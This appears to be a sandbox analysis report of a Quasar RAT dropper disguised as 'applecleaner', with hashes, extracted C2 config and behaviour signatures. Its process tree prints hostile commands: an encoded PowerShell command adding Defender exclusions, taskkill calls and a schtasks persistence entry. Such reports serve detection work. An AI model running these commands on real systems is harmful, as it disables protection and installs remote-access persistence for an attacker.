Overview

overview

10

Static

static

3

applecleaner (1).exe

windows10-2004-x64

10

applecleaner (1).exe

windows10-ltsc 2021-x64

10

applecleaner (1).exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    595s
  • max time network
    600s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    03-01-2025 23:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    applecleaner (1).exe

  • Size

    6.7MB

  • MD5

    cad8354da177706b2d48dd9d0642d9f0

  • SHA1

    ea69a1e3cf00894543bb40f5ee4251439e3b2252

  • SHA256

    62fc499b88eeb0334509ede6bba0f67dcdce5eb7954e5cbd2adfaabc0e2d405e

  • SHA512

    f9dc85730ee4e729358a9acf3d5ace4aa146f16736dd368308c2feb4ee876d0a60b586907aa556ea357459eeb2c678451667ae4bb5dee3e94c2ca39719945f78

  • SSDEEP

    196608:3pm+PJQbtnYGscd8rQcDw9Le+3L+cES9SDI:3pm2MnYG96jR+3LM

Score
10/10
quasarretiggadefense_evasiondiscoveryevasionspywarethemidatrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

retigga

C2

192.168.1.90:4782

Mutex

a44d3f31-890a-4898-b165-c2376c429bdc

Attributes
  • encryption_key

    44D22D01383E73D0D2E9F33669A5C563ECE6903D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Kills process with taskkill 3 IoCs
    evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\applecleaner (1).exe
    "C:\Users\Admin\AppData\Local\Temp\applecleaner (1).exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4368
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAaABuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAbgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAdwBoACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1732
    • C:\Users\Admin\AppData\Local\Temp\applecleaner.exe
      "C:\Users\Admin\AppData\Local\Temp\applecleaner.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:3348
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3520
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im EpicGamesLauncher.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1888
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1424
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im FortniteClient-Win64-Shipping.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1036
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c taskkill /f /im Battle.net.exe >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2332
        • C:\Windows\system32\taskkill.exe
          taskkill /f /im Battle.net.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4600
    • C:\Users\Admin\AppData\Local\Temp\Client-built.exe
      "C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4612
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3244
      • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2076
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2044

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Client-built.exe
    Filesize

    3.1MB

    MD5

    6453142cfb0e786c06e25d3e844e09b6

    SHA1

    9262b0721295b5b7467d81f8ca4ce49d402b3a6d

    SHA256

    f6a894441fc6b6fee1bc6dcce6515da3f113abe89ff69fba219795887c2a8e8e

    SHA512

    06168bd38aea958a1c929e7660c09c62eae713af29e2967b728d8e29244798294b830f2392cc4ff32665e4c3112e9de2cfb0db73dca537b717521f76f03cbd1e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a1xu3vm2.l1y.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\applecleaner.exe
    Filesize

    3.6MB

    MD5

    22dd2356db64b549a2b3b6acde0c0c38

    SHA1

    e6a313207fe182486c495bbfd22d1c39037528e5

    SHA256

    4fc5a913380bc5b9e54b38fcf5735272aa84b74108d6b949bbedf39ae2789233

    SHA512

    2208d5b7f903967883dba234caa45422a1df48dc0b6b4ce9eae172b1dd8f8ac7ecf2a150f70f2eb95971bbbd099f343f184cb4785befcf793617dd2722fe417b

    Download Submit

  • memory/1732-36-0x00000000061A0000-0x0000000006206000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1732-56-0x00000000705E0000-0x000000007062C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1732-28-0x00000000031E0000-0x0000000003216000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1732-71-0x0000000007E60000-0x0000000007EF6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/1732-30-0x0000000005AD0000-0x000000000619A000-memory.dmp

    Filesize

    6.8MB

    Download

  • memory/1732-70-0x0000000007C60000-0x0000000007C6A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1732-69-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1732-68-0x0000000008230000-0x00000000088AA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1732-67-0x0000000007A90000-0x0000000007B33000-memory.dmp

    Filesize

    652KB

    Download

  • memory/1732-66-0x0000000006EB0000-0x0000000006ECE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1732-37-0x0000000006280000-0x00000000062E6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1732-55-0x0000000006E70000-0x0000000006EA2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/1732-35-0x0000000005910000-0x0000000005932000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1732-49-0x00000000064B0000-0x0000000006807000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1732-50-0x0000000006860000-0x000000000687E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1732-51-0x00000000068B0000-0x00000000068FC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2076-53-0x00000000031C0000-0x0000000003210000-memory.dmp

    Filesize

    320KB

    Download

  • memory/2076-54-0x000000001CCE0000-0x000000001CD92000-memory.dmp

    Filesize

    712KB

    Download

  • memory/3348-24-0x00007FF61C070000-0x00007FF61CA03000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3348-34-0x00007FF61C070000-0x00007FF61CA03000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3348-33-0x00007FF61C070000-0x00007FF61CA03000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3348-32-0x00007FF61C070000-0x00007FF61CA03000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3348-31-0x00007FF61C070000-0x00007FF61CA03000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3348-74-0x00007FF61C070000-0x00007FF61CA03000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/4612-52-0x00007FFFEEA40000-0x00007FFFEF502000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4612-26-0x0000000000400000-0x0000000000724000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/4612-25-0x00007FFFEEA43000-0x00007FFFEEA45000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4612-29-0x00007FFFEEA40000-0x00007FFFEF502000-memory.dmp

    Filesize

    10.8MB

    Download